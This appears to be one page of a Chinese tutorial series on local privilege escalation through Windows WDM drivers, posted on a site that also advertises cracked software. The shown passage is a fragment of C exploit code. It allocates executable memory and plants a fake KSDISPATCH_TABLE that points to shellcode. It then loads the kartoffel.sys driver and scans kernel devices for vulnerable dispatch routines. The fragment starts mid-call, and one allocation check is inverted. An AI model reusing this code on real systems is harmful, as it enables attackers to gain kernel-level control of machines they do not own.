|TAG标签|网站地图设为首页】【加入收藏

免费教程_免费网赚教程_破解版软件-寂涯网络学习基地

热门标签

当前位置: 主页 > 系统综合 > 系统安全 > 利用 WDM 驱动 本地提权(8)

利用 WDM 驱动 本地提权(8)

时间:2011-11-29 12:10来源:未知 整理:寂涯网络 点击:


                                        &dwShellSize,
                                       
MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN,
                                 PAGE_EXECUTE_READWRITE );
    if( (ULONG_PTR)addr )
    {

 printf("[*] Error while allocating memory\n");
        return 0;
    }
    printf("OK\n");
    printf("[+] Setting up the fake KSDISPATCH_TABLE ...");
    stFakeTable.Write = (ULONG_PTR) ShellCode;
    memcpy(    (void*)((ULONG_PTR)addr + 0x20),
            (void*)&stFakeTable,
            sizeof(KSDISPATCH_TABLE) );
    *(ULONG_PTR*)addr = sizeof(ULONG_PTR); // Fake FsContext
    *(ULONG_PTR*)((ULONG_PTR)addr + sizeof(ULONG_PTR)) = 0x20;
    printf("OK\n");
    /// Checking Windows Version
    CheckOS( &osVersion );
    if( !osVersion )
    {
        signature = signature_2K_SP4;
        signature_size = sizeof( signature_2K_SP4 ) - 1;
        sig_offset = 4;
    }    else     {
        signature = signature_XPSP2_Vista_2K3;
        signature_size = sizeof( signature_XPSP2_Vista_2K3 ) - 1;
        sig_offset = 8;
}
hKdevice = OpenKDevice();
    if (hKdevice == INVALID_HANDLE_VALUE) 
    {
        InitializePaths(&kDirs);
        sprintf(szKdriver,
                "%s\\kartoffel.sys",
                kDirs.KARTO_PATH);
        printf("\n\n[+] Kartoffel.sys not detected.
Loading %s\n",szKdriver);
        if( !LoadDriver( szKdriver,"KartoffelDrv") )
        {
            printf("[!] Unable to load kartoffel.sys\n");
            exit(0);
        }
   hKdevice = OpenKDevice();
        if( hKdevice == INVALID_HANDLE_VALUE ) 
            return 0;
    }
    //// Searching vulnerable devices  

dwNum = EnumDevices ( ( WCHAR** )&lpDevices );
    printf("\n[+] Searching vulnerable devices...\n\n");
    for( i = 0; i< dwNum; i++ )
    {
        printf("\r\t :: %d analyzed",i);
        dwStatus = GetDriverObjectByName ( lpDevices[i], &drvObj );
        if( dwStatus )
            {
                /// Compares IRP_MJ_**** with the signature
                dwStatus = ReadKernelMemory( ( LPVOID ) lpWrite,
                                            ( LPVOID )

本页地址 http://www.jybase.net/xitonganquan/20111129678.html

百度搜索更多

谷歌搜索更多

顶一下
(0)
0%
踩一下
(0)
0%
------分隔线----------------------------

评价:
昵称: 验证码:点击我更换图片

快速评论

    推荐内容
    赞助商
    热点内容
    赞助商
    

    关于本站免责声明视频更新google百度地图视频地图RRS订阅

    如有什么问题请在本站留言,或发邮件到 hxt167#foxmail.com

    Copyright © 2010-2012 寂涯网络 版权所有